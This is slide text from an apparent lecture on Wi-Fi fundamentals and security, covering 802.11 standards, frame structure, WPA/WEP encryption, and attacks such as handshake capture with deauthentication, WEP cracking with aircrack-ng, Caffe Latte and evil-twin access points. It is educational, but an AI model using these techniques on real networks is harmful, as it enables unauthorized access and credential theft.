The Radio Spectrum in the US

1
Source US Department of Commerce http://www.ntia.doc.gov/osmhome/allochrt.PDF
Wi-Fi Radio Spectrum
2
Wi-Fi is an unlicensed
service

It has beginnings in the ISM
(industrial Scientific Medical)
band where it was not
desirable or profitable to
license such short range
devices.
2.4 GHz 5 GHz
The first frequencies available for
Wi-Fi use were in the 2.4 GHz
range

As Wi-Fi popularity and usage
increased, the regulatory bodies
allocated additional spectrum in
the
5 GHz band.

The spectrum we use today is also
used by Amateur (Ham Radio) and
other services such as radio
location (radar).

There is more bandwidth in 5 GHz
with mechanisms in place to co-
exist with licensed services such
as radar using Dynamic Frequency
Selection
Wi-Fi Radio Spectrum 2.4 Ghz
3
Even today, many portable devices in use are limited
to 2.4 GHz only, including newer devices, but this is
changing.

802.11b/g is 2.4 GHz
802.11a is 5 GHz
802.11n (can be either band) 2.4 or 5 GHz
The 2.4 GHz spectrum in the US
has 3 non-overlapping channels
1, 6 and 11.

There are plenty of channels in
the 5 GHz spectrum and they do
not overlap

2.4 GHz and 5 GHz are different
portions of the radio band and
usually require separate
antennas

Most, if not all, 5 GHz devices
also have support for 2.4 GHz -
however there are still many 2.4
GHz only devices.
Wi-Fi Radio Spectrum 2.4 GHz
4
Wi-Fi Radio Spectrum 5 GHz Channels
5
Note: 5 GHz channels do
not have the severe
overlap that 2.4 GHz
channels have but they
use DFS to enable
sharing of the band
Wi-Fi Radio Spectrum 5 GHz Channels
6
Note: 5 GHz channels do
not have the severe
overlap that 2.4 GHz
channels have but they
use DFS to enable
sharing of the band
Wi-Fi Based on a Series of 802.11 PHY
Standards
7
802.11b 802.11a
802.11g
802.11n
802.11ah
802.11af
802.11ad
The Future The Past
802.11ac
Wi-Fi connectivity today is based on a the
802.11a/b/g/n PHY standards ...
8
Band
2.4Ghz
5GHz
DSSS
802.11b-1999 802.11g-2003
802.11a-1999
OFDM
802.11n-2009
(D2.0-2006)
PHY rate <11Mb/s <54Mb/s <600Mb/s
Technology
802.11ac, the next generation Wi-Fi, is just
around the corner

9
Use cases
Technology
Functionality
Availability
Similar to 802.11n
Voice/video/data for consumer/enterprise
Extension of 802.11n in 5GHz only
Similar range to 802.11n
Faster than 802.11n up to ~2.5Gb/s
First usable draft standard in early 2012
First wave of certification in early 2013
I
E
E
E

8
0
2
.
1
1
a
c

802.11ac uses MU-MIMO to provide switch
rather than hub technology
10
Single User MIMO in 802.11n
sends one frame to one receiver
Multi-user MIMO in 802.11ac
sends multiple frames to multiple
receivers
AP with 4 antennas can send 1 stream
each to 3 smartphones, all at the same
time
AP must beamform 1 space-time stream
to the each receiver & simultaneously
null-steer that space-time stream to the
two other receivers
Basic Terminology
Stations
Clients (mobile devices, laptops, printers, etc)
Access Points
802.11 frames must be converted in order to
communicate with the wired network
This bridging function is the most important
part of an access point
11
Basic Terminology
Basic Service Set (BSS)
Basic building block of all wireless networks essentially one or
more stations that communicate with each other

Independent BSS (IBSS)
Also known as an Ad-Hoc network. A network comprised of one
or more stations without the user of an access point

Infrastructure BSS
Most common type of deployment these networks consist of at
least one station and one access point
Station to station communication is relayed by the access point.

12
Basic Terminology
Extended Service Set (ESS)
Formed by linking BSSs together
Usually created to extend the range of a single BSS to facilitate
a greater coverage area
Stations in an ESS may communicate with each other even if
they are in different BSSs

Multi-BSS
Due to the popularity of wireless networks, radio chipset
manufacturers created the ability to have multiple BSS using the
same hardware
This greatly expands functionality by allowing BSSs to be
associated with specific VLANs

13
802.11 LAN architecture
14
Identifiers
BSS Identifier (BSSID)
usually the MAC address
of the access point
service the BSS

Service Set Identifier
(SSID/ESSID) a
friendly name given to
the network

BSSID: 00:12:31:00:11:00
SSID: Poly
Internet
ethernet
switch
AP
AP
BSSID: 00:12:34:23:22:33
SSID: Poly
Framing
Generic 802.11 Frame

Data and Management Frames

802.11 Session States




15
Generic 802.11 Frame
16
Type
From
AP
Subtype
To
AP
More
frag
WEP
More
data
Power
mgt
Retry Rsvd
Protocol
version
2
2 4 1 1 1 1 1 1 1 1
frame
control
duration
address
1
address
2
address
4
address
3
payload CRC
2 2 6 6 6 2
6
0 - 2312
4
seq
control
frame control field expanded:
Type/subtype distinguishes
beacon, association, ACK, RTS,
CTS, etc frames.
To/From AP defines meaning of
address fields
802.11 allows for fragmentation at
the link layer
802.11 allows stations to enter
sleep mode
Seq number identifies
retransmitted frames (eg, when
ACK lost)
WEP = 1 if encryption is used
802.11 Frame: Addressing
17
frame
control
duration
address
1
address
2
address
4
address
3
payload CRC
2 2 6 6 6 2
6
0 - 2312
4
seq
control
Address 2: MAC address
of wireless host or AP
transmitting this frame
Address 1: MAC address
of wireless host or AP
to receive this frame
Address 3: MAC address
of router interface to which
AP is attached
Address 4: used only in
ad hoc mode
18
Internet
router
AP
H1
R1
H1 MAC addr AP MAC addr R1 MAC addr
address 1 address 2 address 3
802.11 frame
H1 MAC addr R1 MAC addr
dest. address source address
802.3 frame
802.11 Frame: Addressing
19
Internet
router
AP
H1
R1
AP MAC addr H1 MAC addr R1 MAC addr
address 1 address 2 address 3
802.11 frame
R1 MAC addr H1 MAC addr
dest. address source address
802.3 frame
802.11 Frame: Addressing
Types of Frames
Type
From
AP
Subtype
To
AP
More
frag
WEP
More
data
Power
mgt
Retry Rsvd
Protocol
version
2
2 4 1 1 1 1 1 1 1 1
frame
control
duration
address
1
address
2
address
4
address
3
payload CRC
2 2 6 6 6 2
6
0 - 2312
4
seq
control
Data Frames:
Data frames are encrypted when
the protected flag is set
Frame Control Type: 10 and
subtype is commonly 0000 (Data)



Management Frames:
Address fields are fixed values
Frame payload contains
management info
Frame Control Type: 00



Management Frames
Association Request subtype 0000
Association Response subtype 1000
Re-Assoc Request subtype 0010
Re-Assoc Response subtype 0010
Probe Request 0100
Probe Response 0101
Beacon 1000
Disassociation 1010
Authentication 1011
Deauthentication - 1100

21
Management Frames - Beacons
Beacons are set a reoccurring intervals by
the AP to announce the existence of a
network
Normally contains information such as the
SSID
Wireless networks are considered hidden
when the SSID is omitted from the
beacons?
22
Management Frame Probe Requests and
Responses
Probe Requests
Probe requests are sent by stations to scan for in-range networks
The station will channel hop through all available channels when searching for its networks
during this process
Stations can also send broadcast probe requests to solicit a response to any AP in its vicinity

Probe Reponses
Access points acknowledge a probe request with a probe response to indicate to the client
that a compatible network exists
APs that dont respond to broadcast probe requests are considered closed
23
802.11 Session States
Authentication
Establish the wireless stations identity to the access
point
Open Authentication
Access Point permits any station
Shared Key Authentication
A shred key must be present (WEP only)
AP sends challenge, client encrypts challeng with
key, sends response to AP
Deauthentication
Terminates a previously established session
24
802.11 Session States
Association
Record keeping process where the AP identifies itself
as the gateway for a particular wireless stations
Disassociation
The process of removing the wireless station from the
network
Roaming/Reassociation
Since clients are not tethered by cable, clients can
move freely around their physical location
In a large ES, one AP may provide a better signal
strength as the clients moves around
25
Session Establishment
Putting it all together
26
WiFi Security
27
Wi-Fi Security State
28
Broken many years ago
Replaced by WPA & then
WPA2
Do not use!!!!
Based on TKIP & 802.1X
Breaking
Transitional mechanism
Avoid use!
Wi-Fi Protected Setup
Designed to encourage
consumers to actually use
security
Based on WPA2 but not
enterprise class
Wi-Fi Alliance is strongly encouraging use of
WPA2 (for enterprise & consumer), and Wi-Fi
Protected Setup (for consumer)
802.11w defines security for management frames
and was certified in early 2012 by the Wi-Fi
Alliance
There are ongoing efforts in 802.11ai to optimise
the process of setting up WPA2 security
WEP WPA WPA2
Based on AES & 802.1X
Enterprise class,
particularly when used
with appropriate EAP
methods
WPA
29
About WPA
IEEE 802.11i
History
Draft in 2003, ratified in 2004
Latest is 802.11-2007
Encryption
Needed to address the issues in WEP
Introduced TKIP and AES
RC4 TKIP (Temporal Key Integrity Protocol)
Major improvement over WEP but still based on RC4
Developed so that WEP could be easily upgraded
AES CCMP (Advanced Encryption Standard)
Counter Mode with Cipher Block Chaining - Message Auth Code)
Complete redesign of encryption mechanisms
Developed to completely replace WEP and TKIP
30
About WPA
IEEE 802.11i
WPA
Certification by the WiFi Alliance
Hastily released in 2003 to certify devices up to the current at the time
802.11i draft
Implies at least TKIP support
Latest is 802.11-2007
WPA2
Certification by the WiFi Alliance
Released in 2004 once the 802.11i draft was ratified
Full compliance with the standard, support for AES and TKIP
31
About WPA
TKIP and AES Security Improvements
RC4 - TKIP
Increases the size of the Initialization Vector to 48-bits and the key size
to 128 bits
Message Integrity Check (MIC) within the frame
Dynamic Key Rotation
AES - CCMP
Complete redesign, no longer uses RC4
Re-keys automatically to derive new sets of temporal keys
Uses Packet Number field as a counter to provide replay protection
32
About WPA
Authentication
WPA Personal (WPA-PSK)
A single pre-shared key is distributed to users
If you have the key, you can connect to the network
Most suited for home use.
WPA Enterprise
Flexible Authentication
Can be user based, computer based, etc
Permits centralized user management
Per user Authentication, Authorization and Accounting (AAA)
Most suited for corporations, small businesses.

33
About WPA
Joining the Network with WPA
Step 1: 802.11 Session Establishment
Standard Probe/Authentication/Association Requests and Responses
Step 2: EAP Handshake
Only in WPA Enterprise to generate PMK, more on this later
Step 3: 4 way handshake.
Use PMK to generate/establish encryption keys
Step 4: Data Communication
Successful authentication, now a connected party

34
About WPA
Joining the Network with WPA
Step 1: 802.11 Session Establishment
Standard Probe/Authentication/Association Requests and Responses
Step 2: EAP Handshake
Only in WPA Enterprise to generate PMK, more on this later
Step 3: 4 way handshake.
Use PMK to generate/establish encryption keys
Step 4: Data Communication
Successful authentication, now a connected party

35
WPA Enterprise Authentication
IEEE 802.1X
Standard for access control
Commonly used on wired switches
Introduces three new terms
Supplicant Client attempting to connect to the network
Authenticator Controls access to the network; usually the AP
Authentication Server Authorizes user to connect (Radius Server)
Uses EAP for messaging

36
WPA Enterprise Authentication
Extensible Authentication Protocol (EAP)
Originally designed and used for dial-up networking (PPP)
Officially, EAP only has 4 general message types:
EAP-Request
EAP-Response
EAP-Success
EAP-Failure
Supports a variety of authentication methods
Defined by the type field of EAP-Request/Response frames
EAP-TLS Certificate based authentication
LEAP username/password authentication
PEAP/EAP-TTLS/EAP-FAST Certificate + username/password authentication



37
WPA Enterprise Authentication
EAP Handshake



38
WPA Encryption
Keying
Pairwise Master Key (PMK): Used to derive all other keys
WPA-Pre-Shared Key: derived by the PSK
WPA-Enterprise: created at the RADIUS server and distributed
The four way handshake
Establishes encryption between the AP and the client
Pairwise Transit Key (PTK)
The key used to encrypt unicast 802.11 traffic
Group Temporal Key (GTK)
The key used to encrypt broadcast and multicast 802.11 traffic




39
Attacking WPA
Authentication
Most common attacks
Only a limited number exist
Requires at least 1 connected client
Yields username and password
Almost always requires offline brute forcing
Using a complex password thwarts the attack
Encryption
Emerging attacks
Results in the ability to encrypt/decrypt limited traffic
Can inject a small number of packets
Not very stealthy




40
Attacking Authentication: WPA-PSK
Theory
Capture 4-way Handshake
Its possible to deduce the PSK using the data in the handshake
Passively: Sniff and new clients connection
Actively: DoS (de-authentication attack) the client and watch him reconnect.
Brute Force
With the handshake we can launch an offline brute force attack




41
Attacking Authentication WPA Enterprise
Used in most corporations
Attacks are categorized by EAP Type
A good deployment is hard to break into
Most attacks require brute force
Successful attack results in credentials to access the
network as a regular user




42
Attacking Authentication WPA Enterprise
Authentication Methods - LEAP
About
Stands for Lightweight EAP
Proprietary EAP type developed by Cisco
Operation
Uses MSCHAP Challenge/Response mechanism for authentication
This handshake is transmitted in clear text between the client and the
authentication server




43
Attacking Authentication WPA Enterprise
Authentication Methods EAP/TTLS and PEAP
About
Both establish an SSL tunnel between the client and authentication server
Tunnel is used to transmit less secure inner authentication credentials (i.e.
PAP/CHAP/MS-CHAP)
EAP-TTLS (Tunnel TLS)
Developed by Funk Software (now Juniper) and Certicom
Supports and inner authentication protocol
PEAP (Protected EAP)
Replacement for LEAP. Developed by RSA, Microsoft and Cisco
Only supports a limited number of inner authentication protocols



44
Attacking Authentication WPA Enterprise
Authentication Methods EAP/TTLS and PEAP
How it works



45
Attacking Authentication WPA Enterprise
Authentication Methods EAP/TTLS and PEAP
Attacks Vectors
Improper certificate validation
Certificates allow the client to ensure the identity of the authentication server
Client is commonly configured to ignore this certificate
This allows an attacker to impersonate an AP and gain access to the inner
authentication credentials


46
WEP
47
Understanding WEP Encryption
History of WEP
1997 WEP Introduced

2001 WEP found to be flawed

2002 104 bit WEP still considered secure

2004 Korek details advanced attacks and aircrack released

2007 PTW attack released WEP DEAD DO NOT USE

Present people and organizations still using WEP


48
Understanding WEP Encryption
WEP
No longer considered a viable method of securing 802.11 frames

Protects information transmitted via the wireless network by encrypting the data
within the 802.11 frame

The client uses the initialization vector (IV) stored within the frame head and the
WEP key to decrypt the data


49
WEP Encryption Process
The CRC-32 ICV
A 4 byte CRC-32 Integrity Check Value (ICV) is computed for the data payload of
the packet and appended to it





The UNIQUE Seed

The shared secret key K is static
A 24 bit Initialization Vector (IV) is concatendated with the key (k) to form a
unique seed


50
Plaintext Message (M) ICV
IV Shared Key (k)
WEP Encryption Process
The Keystream
This seed is input into the RC4 stream cipher which outputs a keystream of
arbitrary length



51
Shared Key (k) IV
RC4
100101001000100000111110101001101101001
Keystream
WEP Encryption Process
Ciphertext
The plaintext data the appended CRC-32 value are XORed against an equal
number of bits from the keystream to create the ciphertext



52
Plaintext Message (M) ICV
100101001000100000111110101001101101001
Keystream
CipherText (C)
XOR
WEP Decryption Process
Decryption The IV is put into the WEP head in Plaintext and the
encrypted packet is sent to the receiver
The receiver uses the IV in the header along with the shared key, k,
to reproduce the RC4 keystream



53
802.11 Hdr IV
100101001000100000111110101001101101001
Shared Key (k)
Ciphertext (C)
IV
RC4
RC4 Keystream
WEP Decryption Process
Decryption
The ciphertext is XORed against the RC4 keystream and the plaintext is
receovered



54
1001001011100101010101001010101010101
Ciphertext (C)
Plaintext Message (M)
XOR
ICV
WEP Decryption Process
Decryption The CRC-32 Integrity Check Value (ICV) computed to
verify the integrity of the data



55
Plantext Message (M) ICV
CRC-32
ICV
Match?
Attacking WEP
Misc Attacks
Verizon FiOS Actiontech MI424WR
Router ships with WEP enabled by default
WEP key is a function of the SSID
SSID is 5 upper case alpha-numeric characters
If you know the the SSID you know the default key!
Java/Bash Generator exists at:
http://xkyle.com/2009/03/03/verizon-fios-wireless-key-calculator
56
Attacking WEP
The Passive Attack
This was the original attack against WEP
Offline attack one enough IVs are obtained
Relies on passively sniffing WLAN traffic
Stealthy
57
Attacking WEP
The Passive Attack using aircrack-ng
This is dependent on a .cap file that contains
enough frames to actually crack WEP.
Frames can be generated quickly using active
attack techniques discussed later
Command:
aircrack-ng <filename>
58
Attacking WEP
Active Attack Theory
Goal: Generate traffic to get unique Ivs
Step 1:Client sends legitimate encrypted data (thus new/valid IV)
Step 2: Attacker observes the traffic and replays it many times
Step 3: AP receives ALL data, decrypts it and processes it
Step 4: Traffic destined for the wireless network is encrypted with a
new IV
59
Attacking WEP
Fake Authentication - Theory
What if there are currently no connected
clients?
It may be possible to launch the Fake
Authentication attack so the AP thinks are an
authorized client
Once we create a false association, we can
forward frames through the new AP after we
figure out how to craft valid ones
60
Attacking WEP
AP-Less Attacks
Caf Latte Attack
Targets individual clients who are not in the vicinity
of the wireless network
We can respond to the clients probe requests and
ultimately gain enough packets during the shared
key authentication, initial DHCP and initial ARP
requests made by the client to forge our own ARP
requests
We bombard the client with ARP requests and
use it responses to crack the WEP key
Currently implemented in airbase-ng
61
Generalized Wireless Attack
Evil Twin
Rogue WiFi access point that appears to be a
legitimate one offered on premises
Attacker fools the wireless device into connecting to
the attackers hotspot vs the real one
Used to steal passwords, redirecting to fraudulent
web sites.
Karmetasploit acts as a wireless AP and answers all probe
requests from wireless clients. Once associated every service
the client tries to access leads to a malicious application
http://dev.metasploit.com/redmine/projects/framework/wiki/Ka
rmetasploit
62